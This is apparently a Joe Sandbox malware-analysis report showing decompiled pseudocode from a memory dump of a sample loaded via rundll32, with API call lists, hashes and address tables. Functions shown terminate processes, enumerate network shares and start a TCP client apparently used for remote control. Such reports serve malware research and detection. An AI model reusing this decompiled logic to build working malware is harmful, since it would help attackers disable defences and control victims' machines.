                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadMetricsProcSystem$CurrentProcessVersion
                                                                                              • String ID: GetNativeSystemInfo$RtlGetNtVersionNumbers$kernel32.dll$ntdll.dll
                                                                                              • API String ID: 3805471242-3094728150
                                                                                              • Opcode ID: e43600793fe9c0359d7e2ff48effb6ede6a6f3e55475b5cb3a2fc46776ea05d3
                                                                                              • Instruction ID: 8680c51f4270dc23751f2a2e677677aae884b4400c11f59c0ca84980f1637539
                                                                                              • Opcode Fuzzy Hash: e43600793fe9c0359d7e2ff48effb6ede6a6f3e55475b5cb3a2fc46776ea05d3
                                                                                              • Instruction Fuzzy Hash: AF515F70B2060AABDB34EF64E845BEAB7F4EF58314F10459DD44A97640EA74AAC5CF40
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 56%
                                                                                              			E0425DD30(intOrPtr __ecx, intOrPtr _a4, void* _a8) {
                                                                                              				intOrPtr _v8;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t19;
                                                                                              				void* _t20;
                                                                                              				int _t25;
                                                                                              				int _t32;
                                                                                              				void* _t40;
                                                                                              				void* _t42;
                                                                                              				void* _t44;
                                                                                              				void* _t49;
                                                                                              				void* _t53;
                                                                                              				void* _t57;
                                                                                              				intOrPtr _t64;
                                                                                              				void* _t67;
                                                                                              				void* _t71;
                                                                                              				void* _t74;
                                                                                              
                                                                                              				_push(__ecx);
                                                                                              				_t40 = _a8;
                                                                                              				_t64 = __ecx;
                                                                                              				_t57 = 0;
                                                                                              				_v8 = __ecx;
                                                                                              				if(_t40 != 0) {
                                                                                              					do {
                                                                                              						_t74 = OpenProcess(0x1fffff, 0,  *(_t57 + _a4));
                                                                                              						TerminateProcess(_t74, 0);
                                                                                              						CloseHandle(_t74);
                                                                                              						_t57 = _t57 + 4;
                                                                                              					} while (_t57 < _t40);
                                                                                              					_t64 = _v8;
                                                                                              				}
                                                                                              				Sleep(0x64);
                                                                                              				_t19 =  *((intOrPtr*)(_t64 + 0xc));
                                                                                              				if(_t19 != 2) {
                                                                                              					__eflags = _t19 - 3;
                                                                                              					if(__eflags != 0) {
                                                                                              						_t20 = E0425DB90(_t64, __eflags);
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						_t20 = E0425D980(_t57, _t64);
                                                                                              						_a8 = _t20;
                                                                                              						__eflags = _t20;
                                                                                              						if(_t20 == 0) {
                                                                                              							goto L10;
                                                                                              						} else {
                                                                                              							_t14 = LocalSize(_t20) + 1; // 0x1
                                                                                              							_t42 = LocalAlloc(0x40, _t14);
                                                                                              							_t67 = _a8;
                                                                                              							_t16 = _t42 + 1; // 0x1
                                                                                              							_t49 = _t16;
                                                                                              							 *_t42 = 0x8e;
                                                                                              							E0427E060(_t49, _t67, _t21);
                                                                                              							LocalFree(_t67);
                                                                                              							_t25 = LocalSize(_t42);
                                                                                              							_push(_t49);
                                                                                              							_push(0x3f);
                                                                                              							_push(_t25);
                                                                                              							_push(_t42);
                                                                                              							E04251C60( *((intOrPtr*)(_v8 + 4)));
                                                                                              							return LocalFree(_t42);
                                                                                              						}
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t20 = E0425D570(_t57, _t64);
                                                                                              					_a8 = _t20;
                                                                                              					if(_t20 == 0) {
                                                                                              						L10:
                                                                                              						return _t20;
                                                                                              					} else {
                                                                                              						_t8 = LocalSize(_t20) + 1; // 0x1
                                                                                              						_t44 = LocalAlloc(0x40, _t8);
                                                                                              						_t71 = _a8;
                                                                                              						_t10 = _t44 + 1; // 0x1
                                                                                              						_t53 = _t10;
                                                                                              						 *_t44 = 0x8e;
                                                                                              						E0427E060(_t53, _t71, _t28);
                                                                                              						LocalFree(_t71);
                                                                                              						_t32 = LocalSize(_t44);
                                                                                              						_push(_t53);
                                                                                              						_push(0x3f);
                                                                                              						_push(_t32);
                                                                                              						_push(_t44);
                                                                                              						E04251C60( *((intOrPtr*)(_v8 + 4)));
                                                                                              						return LocalFree(_t44);
                                                                                              					}
                                                                                              				}
                                                                                              			}




















                                                                                              0x0425dd33
                                                                                              0x0425dd35
                                                                                              0x0425dd3a
                                                                                              0x0425dd3c
                                                                                              0x0425dd3e
                                                                                              0x0425dd43
                                                                                              0x0425dd45
                                                                                              0x0425dd58
                                                                                              0x0425dd5d
                                                                                              0x0425dd64
                                                                                              0x0425dd6a
                                                                                              0x0425dd6d
                                                                                              0x0425dd71
                                                                                              0x0425dd71
                                                                                              0x0425dd76
                                                                                              0x0425dd7c
                                                                                              0x0425dd82
                                                                                              0x0425dde9
                                                                                              0x0425ddec
                                                                                              0x0425de51
                                                                                              0x00000000
                                                                                              0x0425ddee
                                                                                              0x0425ddee
                                                                                              0x0425ddf3
                                                                                              0x0425ddf6
                                                                                              0x0425ddf8
                                                                                              0x00000000
                                                                                              0x0425ddfa
                                                                                              0x0425de05
                                                                                              0x0425de11
                                                                                              0x0425de14
                                                                                              0x0425de18
                                                                                              0x0425de18
                                                                                              0x0425de1b
                                                                                              0x0425de1f
                                                                                              0x0425de2e
                                                                                              0x0425de31
                                                                                              0x0425de33
                                                                                              0x0425de37
                                                                                              0x0425de39
                                                                                              0x0425de3a
                                                                                              0x0425de3e
                                                                                              0x0425de4c
                                                                                              0x0425de4c
                                                                                              0x0425ddf8
                                                                                              0x0425dd84
                                                                                              0x0425dd84
                                                                                              0x0425dd89
                                                                                              0x0425dd8e
                                                                                              0x0425de56
                                                                                              0x0425de5c
                                                                                              0x0425dd94
                                                                                              0x0425dd9f
                                                                                              0x0425ddab
                                                                                              0x0425ddae
                                                                                              0x0425ddb2
                                                                                              0x0425ddb2
                                                                                              0x0425ddb5
                                                                                              0x0425ddb9
                                                                                              0x0425ddc8
                                                                                              0x0425ddcb
                                                                                              0x0425ddcd
                                                                                              0x0425ddd1
                                                                                              0x0425ddd3
                                                                                              0x0425ddd4
                                                                                              0x0425ddd8
                                                                                              0x0425dde6
                                                                                              0x0425dde6
                                                                                              0x0425dd8e

                                                                                              APIs
                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,?,?,0425D47D,?,?), ref: 0425DD52
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,0425D47D,?,?), ref: 0425DD5D
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,0425D47D,?,?), ref: 0425DD64
                                                                                              • Sleep.KERNEL32(00000064,?,?,?,?,?,0425D47D,?,?), ref: 0425DD76
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DD9B
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,0425D47D,?,?), ref: 0425DDA5
                                                                                              • LocalFree.KERNEL32(?), ref: 0425DDC8
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DDCB
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0425DDDE
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DE01
                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,0425D47D,?,?), ref: 0425DE0B
                                                                                              • LocalFree.KERNEL32(?), ref: 0425DE2E
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DE31
                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F), ref: 0425DE44
                                                                                                • Part of subcall function 0425DB90: LocalAlloc.KERNEL32(00000040,74CF5A91,00000000,?,?), ref: 0425DBDE
                                                                                                • Part of subcall function 0425DB90: LocalFree.KERNEL32(?,?,?,?), ref: 0425DC00
                                                                                                • Part of subcall function 0425DB90: LocalFree.KERNEL32(?,?,?,?), ref: 0425DC1E
                                                                                                • Part of subcall function 0425DB90: LocalSize.KERNEL32(00000000), ref: 0425DC25
                                                                                                • Part of subcall function 0425DB90: LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?), ref: 0425DC3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$Free$Size$Alloc$Process$CloseHandleOpenSleepTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 363554170-0
                                                                                              • Opcode ID: cc79a5b549cba2fbfa9054b2c9583f09c4878c7001c02a3550f5c5bcfec681ce
                                                                                              • Instruction ID: da44f6476504ad634f6b10c8f42a8a740c9ba17cced237531ae251042841fb0d
                                                                                              • Opcode Fuzzy Hash: cc79a5b549cba2fbfa9054b2c9583f09c4878c7001c02a3550f5c5bcfec681ce
                                                                                              • Instruction Fuzzy Hash: A3312773B10214ABD710AFB9EC44E6AB79CEF49220B108256FE05D7240DE71BD01CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E042547A0() {
                                                                                              				void* _v8;
                                                                                              				int _v12;
                                                                                              				void* _v16;
                                                                                              				int _v20;
                                                                                              				int _v24;
                                                                                              				void* _v28;
                                                                                              				void* _t35;
                                                                                              				int _t38;
                                                                                              				int _t45;
                                                                                              				signed int* _t48;
                                                                                              				signed int _t49;
                                                                                              				int _t51;
                                                                                              				long _t57;
                                                                                              				signed int _t59;
                                                                                              				WCHAR* _t60;
                                                                                              				void* _t62;
                                                                                              				WCHAR** _t66;
                                                                                              				void* _t70;
                                                                                              
                                                                                              				_v20 = 0x4000;
                                                                                              				_t57 = 0;
                                                                                              				_v12 = 0xffffffff;
                                                                                              				_v16 = 0;
                                                                                              				if(WNetOpenEnumW(1, 1, 0, 0,  &_v16) == 0) {
                                                                                              					_v8 = LocalAlloc(0x40, 0x400);
                                                                                              					_t35 = LocalAlloc(0x40, _v20);
                                                                                              					_t62 = _t35;
                                                                                              					_v28 = _t62;
                                                                                              					if(_t62 != 0) {
                                                                                              						_t70 = _v8;
                                                                                              						while(1) {
                                                                                              							_t38 = WNetEnumResourceW(_v16,  &_v12, _t62,  &_v20);
                                                                                              							if(_t38 != 0) {
                                                                                              								break;
                                                                                              							}
                                                                                              							_v24 = _t38;
                                                                                              							if(_v12 > _t38) {
                                                                                              								_t66 = _t62 + 0x14;
                                                                                              								do {
                                                                                              									_t45 = lstrlenW( *_t66);
                                                                                              									if(_t57 + (_t45 + 1) * 2 <= LocalSize(_v8)) {
                                                                                              										_t70 = _v8;
                                                                                              									} else {
                                                                                              										_t70 = LocalReAlloc(_v8, _t57 + (lstrlenW( *_t66) + 1) * 2, 0x42);
                                                                                              										_v8 = _t70;
                                                                                              									}
                                                                                              									_t60 =  *_t66;
                                                                                              									_t48 = _t70 + _t57;
                                                                                              									do {
                                                                                              										_t59 =  *_t60 & 0x0000ffff;
                                                                                              										_t60 =  &(_t60[1]);
                                                                                              										 *_t48 = _t59;
                                                                                              										_t48 =  &(_t48[0]);
                                                                                              									} while (_t59 != 0);
                                                                                              									_t49 = lstrlenW( *_t66);
                                                                                              									_t66 =  &(_t66[8]);
                                                                                              									_t51 = _v24 + 1;
                                                                                              									_t57 = _t57 + _t49 * 2 + 2;
                                                                                              									_v24 = _t51;
                                                                                              								} while (_t51 < _v12);
                                                                                              								_t62 = _v28;
                                                                                              							}
                                                                                              						}
                                                                                              						LocalFree(_t62);
                                                                                              						WNetCloseEnum(_v16);
                                                                                              						if(_t70 == 0) {
                                                                                              							L19:
                                                                                              							return _t70;
                                                                                              						} else {
                                                                                              							if(_t57 >= 1) {
                                                                                              								_t70 = LocalReAlloc(_t70, _t57, 0x42);
                                                                                              								goto L19;
                                                                                              							} else {
                                                                                              								LocalFree(_t70);
                                                                                              								return 0;
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						return _t35;
                                                                                              					}
                                                                                              				} else {
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}





















                                                                                              0x042547aa
                                                                                              0x042547b2
                                                                                              0x042547b4
                                                                                              0x042547c1
                                                                                              0x042547cc
                                                                                              0x042547e9
                                                                                              0x042547ee
                                                                                              0x042547f0
                                                                                              0x042547f2
                                                                                              0x042547f7
                                                                                              0x04254800
                                                                                              0x04254803
                                                                                              0x0425480f
                                                                                              0x04254817
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425481d
                                                                                              0x04254823
                                                                                              0x04254825
                                                                                              0x04254828
                                                                                              0x0425482a
                                                                                              0x0425483f
                                                                                              0x04254860
                                                                                              0x04254841
                                                                                              0x04254859
                                                                                              0x0425485b
                                                                                              0x0425485b
                                                                                              0x04254863
                                                                                              0x04254865
                                                                                              0x04254870
                                                                                              0x04254870
                                                                                              0x04254873
                                                                                              0x04254876
                                                                                              0x04254879
                                                                                              0x0425487c
                                                                                              0x04254883
                                                                                              0x04254889
                                                                                              0x04254892
                                                                                              0x04254893
                                                                                              0x04254896
                                                                                              0x04254899
                                                                                              0x0425489e
                                                                                              0x0425489e
                                                                                              0x04254823
                                                                                              0x042548ad
                                                                                              0x042548b2
                                                                                              0x042548ba
                                                                                              0x042548db
                                                                                              0x042548e3
                                                                                              0x042548bc
                                                                                              0x042548bf
                                                                                              0x042548d9
                                                                                              0x00000000
                                                                                              0x042548c1
                                                                                              0x042548c2
                                                                                              0x042548ce
                                                                                              0x042548ce
                                                                                              0x042548bf
                                                                                              0x042547f9
                                                                                              0x042547ff
                                                                                              0x042547ff
                                                                                              0x042547ce
                                                                                              0x042547d4
                                                                                              0x042547d4

                                                                                              APIs
                                                                                              • WNetOpenEnumW.MPR(00000001,00000001,00000000,00000000,?), ref: 042547C4
                                                                                              • LocalAlloc.KERNEL32(00000040,00000400,74CB69A0,?), ref: 042547E4
                                                                                              • LocalAlloc.KERNEL32(00000040,00004000), ref: 042547EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocLocal$EnumOpen
                                                                                              • String ID:
                                                                                              • API String ID: 2229625058-0
                                                                                              • Opcode ID: 685b1af64bc2fbc13917dffe968f531c6df754701d27a0ab02ed460fc97ede89
                                                                                              • Instruction ID: 2987a499d4c7e6e62add6f6c59fcd3141585caba3c9d65a1782521e737a3dc57
                                                                                              • Opcode Fuzzy Hash: 685b1af64bc2fbc13917dffe968f531c6df754701d27a0ab02ed460fc97ede89
                                                                                              • Instruction Fuzzy Hash: 7C418271B04119ABCB10EFA8EC88AADF7B8FF44715F2102A6ED04E7250DB716E518B94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0428BCDF(intOrPtr _a4) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _t25;
                                                                                              				intOrPtr* _t26;
                                                                                              				intOrPtr _t28;
                                                                                              				intOrPtr* _t29;
                                                                                              				intOrPtr* _t31;
                                                                                              				intOrPtr* _t45;
                                                                                              				intOrPtr* _t46;
                                                                                              				intOrPtr* _t47;
                                                                                              				intOrPtr* _t55;
                                                                                              				intOrPtr* _t70;
                                                                                              				intOrPtr _t74;
                                                                                              
                                                                                              				_t74 = _a4;
                                                                                              				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                                              				if(_t25 != 0 && _t25 != 0x42a46f0) {
                                                                                              					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                                              					if(_t45 != 0 &&  *_t45 == 0) {
                                                                                              						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                                              						if(_t46 != 0 &&  *_t46 == 0) {
                                                                                              							E042884AD(_t46);
                                                                                              							E0428BFF3( *((intOrPtr*)(_t74 + 0x88)));
                                                                                              						}
                                                                                              						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                              						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                              							E042884AD(_t47);
                                                                                              							E0428C0F1( *((intOrPtr*)(_t74 + 0x88)));
                                                                                              						}
                                                                                              						E042884AD( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                              						E042884AD( *((intOrPtr*)(_t74 + 0x88)));
                                                                                              					}
                                                                                              				}
                                                                                              				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                              				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                              					E042884AD( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                              					E042884AD( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                              					E042884AD( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                              					E042884AD( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                              				}
                                                                                              				E0428BE52( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                              				_t28 = 6;
                                                                                              				_t16 = _t74 + 0xa0; // 0xa1
                                                                                              				_t55 = _t16;
                                                                                              				_v8 = _t28;
                                                                                              				_t18 = _t74 + 0x28; // 0x29
                                                                                              				_t70 = _t18;
                                                                                              				do {
                                                                                              					if( *((intOrPtr*)(_t70 - 8)) != 0x42a4100) {
                                                                                              						_t31 =  *_t70;
                                                                                              						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                              							E042884AD(_t31);
                                                                                              							E042884AD( *_t55);
                                                                                              						}
                                                                                              						_t28 = _v8;
                                                                                              					}
                                                                                              					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                              						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                                              						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                              							E042884AD(_t29);
                                                                                              						}
                                                                                              						_t28 = _v8;
                                                                                              					}
                                                                                              					_t55 = _t55 + 4;
                                                                                              					_t70 = _t70 + 0x10;
                                                                                              					_t28 = _t28 - 1;
                                                                                              					_v8 = _t28;
                                                                                              				} while (_t28 != 0);
                                                                                              				return E042884AD(_t74);
                                                                                              			}















                                                                                              0x0428bce7
                                                                                              0x0428bceb
                                                                                              0x0428bcf3
                                                                                              0x0428bcfc
                                                                                              0x0428bd01
                                                                                              0x0428bd08
                                                                                              0x0428bd10
                                                                                              0x0428bd18
                                                                                              0x0428bd23
                                                                                              0x0428bd29
                                                                                              0x0428bd2a
                                                                                              0x0428bd32
                                                                                              0x0428bd3a
                                                                                              0x0428bd45
                                                                                              0x0428bd4b
                                                                                              0x0428bd4f
                                                                                              0x0428bd5a
                                                                                              0x0428bd60
                                                                                              0x0428bd01
                                                                                              0x0428bd61
                                                                                              0x0428bd69
                                                                                              0x0428bd7c
                                                                                              0x0428bd8f
                                                                                              0x0428bd9d
                                                                                              0x0428bda8
                                                                                              0x0428bdad
                                                                                              0x0428bdb6
                                                                                              0x0428bdbe
                                                                                              0x0428bdbf
                                                                                              0x0428bdbf
                                                                                              0x0428bdc5
                                                                                              0x0428bdc8
                                                                                              0x0428bdc8
                                                                                              0x0428bdcb
                                                                                              0x0428bdd2
                                                                                              0x0428bdd4
                                                                                              0x0428bdd8
                                                                                              0x0428bde0
                                                                                              0x0428bde7
                                                                                              0x0428bded
                                                                                              0x0428bdee
                                                                                              0x0428bdee
                                                                                              0x0428bdf5
                                                                                              0x0428bdf7
                                                                                              0x0428bdfc
                                                                                              0x0428be04
                                                                                              0x0428be09
                                                                                              0x0428be0a
                                                                                              0x0428be0a
                                                                                              0x0428be0d
                                                                                              0x0428be10
                                                                                              0x0428be13
                                                                                              0x0428be16
                                                                                              0x0428be16
                                                                                              0x0428be28

                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 0428BD23
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C010
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C022
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C034
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C046
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C058
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C06A
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C07C
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C08E
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C0A0
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C0B2
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C0C4
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C0D6
                                                                                                • Part of subcall function 0428BFF3: _free.LIBCMT ref: 0428C0E8
                                                                                              • _free.LIBCMT ref: 0428BD18
                                                                                                • Part of subcall function 042884AD: HeapFree.KERNEL32(00000000,00000000,?,042812C5,00000001,00000001), ref: 042884C3
                                                                                                • Part of subcall function 042884AD: GetLastError.KERNEL32(D33DB39D,?,042812C5,00000001,00000001), ref: 042884D5
                                                                                              • _free.LIBCMT ref: 0428BD3A
                                                                                              • _free.LIBCMT ref: 0428BD4F
                                                                                              • _free.LIBCMT ref: 0428BD5A
                                                                                              • _free.LIBCMT ref: 0428BD7C
                                                                                              • _free.LIBCMT ref: 0428BD8F
                                                                                              • _free.LIBCMT ref: 0428BD9D
                                                                                              • _free.LIBCMT ref: 0428BDA8
                                                                                              • _free.LIBCMT ref: 0428BDE0
                                                                                              • _free.LIBCMT ref: 0428BDE7
                                                                                              • _free.LIBCMT ref: 0428BE04
                                                                                              • _free.LIBCMT ref: 0428BE1C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: 718c002804b1764ae6112cb3a9d86b7ec2195b3a7b061ee471232adb90fce55b
                                                                                              • Instruction ID: f37de83feaf655cb7125a409442c1f1fff8a3c805daee461042e840b4a9c50e1
                                                                                              • Opcode Fuzzy Hash: 718c002804b1764ae6112cb3a9d86b7ec2195b3a7b061ee471232adb90fce55b
                                                                                              • Instruction Fuzzy Hash: 96314C32722206AFEB20BA39E844B5E7BE8EB00324F54881DF459DB1D1DE71F851DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 75%
                                                                                              			E0426ECE0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                              				signed int _v8;
                                                                                              				char _v36;
                                                                                              				char _v64;
                                                                                              				long _v68;
                                                                                              				intOrPtr _v72;
                                                                                              				signed int _t47;
                                                                                              				long _t60;
                                                                                              				long _t61;
                                                                                              				signed int _t69;
                                                                                              				intOrPtr _t76;
                                                                                              				intOrPtr _t82;
                                                                                              				intOrPtr* _t105;
                                                                                              				signed int _t109;
                                                                                              
                                                                                              				_t47 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t47 ^ _t109;
                                                                                              				_t82 = _a4;
                                                                                              				_t105 = __ecx;
                                                                                              				_v72 = _a16;
                                                                                              				if( *((intOrPtr*)( *__ecx + 0xb0))() == 0) {
                                                                                              					L16:
                                                                                              					__eflags = _v8 ^ _t109;
                                                                                              					return E04275AFE(_v8 ^ _t109);
                                                                                              				} else {
                                                                                              					E0426EC90(__ecx + 0x148);
                                                                                              					_t113 =  *(__ecx + 0x50) - 3;
                                                                                              					if( *(__ecx + 0x50) != 3) {
                                                                                              						 *(__ecx + 0x48) = 1;
                                                                                              						SetLastError(0x139f);
                                                                                              						 *(_t105 + 0x148) = 0;
                                                                                              						goto L16;
                                                                                              					} else {
                                                                                              						 *(__ecx + 0x50) = 0;
                                                                                              						 *(__ecx + 0x148) = 0;
                                                                                              						 *((intOrPtr*)( *__ecx + 0xb4))();
                                                                                              						 *(__ecx + 0xc) = 1;
                                                                                              						_v36 = 0;
                                                                                              						_v64 = 0;
                                                                                              						 *((intOrPtr*)(__ecx + 0x10)) = 5;
                                                                                              						 *(__ecx + 0x14) = 0;
                                                                                              						 *(__ecx + 0x18) = 1;
                                                                                              						_v68 = 0;
                                                                                              						_t60 = E0426EF50(_t82, __ecx, __ecx, _t113, _t82,  &_v36, _a8, _v72,  &_v64);
                                                                                              						if(_t60 == 0) {
                                                                                              							__imp__#111();
                                                                                              							 *(__ecx + 0x48) = 3;
                                                                                              							goto L13;
                                                                                              						} else {
                                                                                              							_t60 = E0426DB70(__ecx, __ecx, GetLastError,  &_v64,  &_v36, _a20);
                                                                                              							if(_t60 == 0) {
                                                                                              								__imp__#111();
                                                                                              								 *(__ecx + 0x48) = 4;
                                                                                              								L13:
                                                                                              								SetLastError(_t60);
                                                                                              								goto L14;
                                                                                              							} else {
                                                                                              								SetLastError(0);
                                                                                              								_push( *((intOrPtr*)(_t105 + 0x1c)));
                                                                                              								if( *((intOrPtr*)( *_t105 + 0x78))() == 2) {
                                                                                              									_t69 = GetLastError();
                                                                                              									__eflags = _t69;
                                                                                              									_t70 =  ==  ? 0x4c7 : _t69;
                                                                                              									E0426EBB0(_t105, 5, "CTcpClient::Start",  ==  ? 0x4c7 : _t69);
                                                                                              									goto L14;
                                                                                              								} else {
                                                                                              									_t98 = _t105;
                                                                                              									if(E0426F0B0( &_v36, _t105,  &_v36, _a12) == 0) {
                                                                                              										__imp__#111();
                                                                                              										E0426EBB0(_t105, 0xb, "CTcpClient::Start", _t73);
                                                                                              										goto L14;
                                                                                              									} else {
                                                                                              										_t76 = E0427F897(_t98, 0, 0, E0426F190, _t105, 0, _t105 + 0x44);
                                                                                              										 *((intOrPtr*)(_t105 + 0x40)) = _t76;
                                                                                              										if(_t76 == 0) {
                                                                                              											E0426EBB0(_t105, 8, "CTcpClient::Start", 0x65f);
                                                                                              											L14:
                                                                                              											 *(_t105 + 0xc) = 0;
                                                                                              											 *((intOrPtr*)(_t105 + 0x10)) = 5;
                                                                                              											 *(_t105 + 0x14) = 0;
                                                                                              											 *(_t105 + 0x18) = 1;
                                                                                              											_t61 = GetLastError();
                                                                                              											 *((intOrPtr*)( *_t105 + 4))();
                                                                                              											SetLastError(_t61);
                                                                                              											__eflags = _v8 ^ _t109;
                                                                                              											return E04275AFE(_v8 ^ _t109);
                                                                                              										} else {
                                                                                              											_v68 = 1;
                                                                                              											ResetEvent( *(_t105 + 4));
                                                                                              											return E04275AFE(_v8 ^ _t109);
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}
















                                                                                              0x0426ece6
                                                                                              0x0426eced
                                                                                              0x0426ecf4
                                                                                              0x0426ecf9
                                                                                              0x0426ecfb
                                                                                              0x0426ed08
                                                                                              0x0426eee7
                                                                                              0x0426eeee
                                                                                              0x0426eef9
                                                                                              0x0426ed0e
                                                                                              0x0426ed14
                                                                                              0x0426ed19
                                                                                              0x0426ed1d
                                                                                              0x0426eed0
                                                                                              0x0426eed7
                                                                                              0x0426eedd
                                                                                              0x00000000
                                                                                              0x0426ed23
                                                                                              0x0426ed23
                                                                                              0x0426ed2c
                                                                                              0x0426ed38
                                                                                              0x0426ed40
                                                                                              0x0426ed47
                                                                                              0x0426ed4d
                                                                                              0x0426ed5b
                                                                                              0x0426ed65
                                                                                              0x0426ed6e
                                                                                              0x0426ed75
                                                                                              0x0426ed7c
                                                                                              0x0426ed89
                                                                                              0x0426ee75
                                                                                              0x0426ee7b
                                                                                              0x00000000
                                                                                              0x0426ed8f
                                                                                              0x0426ed9c
                                                                                              0x0426eda3
                                                                                              0x0426ee66
                                                                                              0x0426ee6c
                                                                                              0x0426ee82
                                                                                              0x0426ee89
                                                                                              0x00000000
                                                                                              0x0426eda9
                                                                                              0x0426edb1
                                                                                              0x0426edb7
                                                                                              0x0426edc0
                                                                                              0x0426ee49
                                                                                              0x0426ee4b
                                                                                              0x0426ee52
                                                                                              0x0426ee5f
                                                                                              0x00000000
                                                                                              0x0426edc6
                                                                                              0x0426edcc
                                                                                              0x0426edd6
                                                                                              0x0426ee32
                                                                                              0x0426ee42
                                                                                              0x00000000
                                                                                              0x0426edd8
                                                                                              0x0426ede8
                                                                                              0x0426edf0
                                                                                              0x0426edf5
                                                                                              0x0426ee2b
                                                                                              0x0426ee8b
                                                                                              0x0426ee8b
                                                                                              0x0426ee92
                                                                                              0x0426ee99
                                                                                              0x0426eea0
                                                                                              0x0426eea7
                                                                                              0x0426eeaf
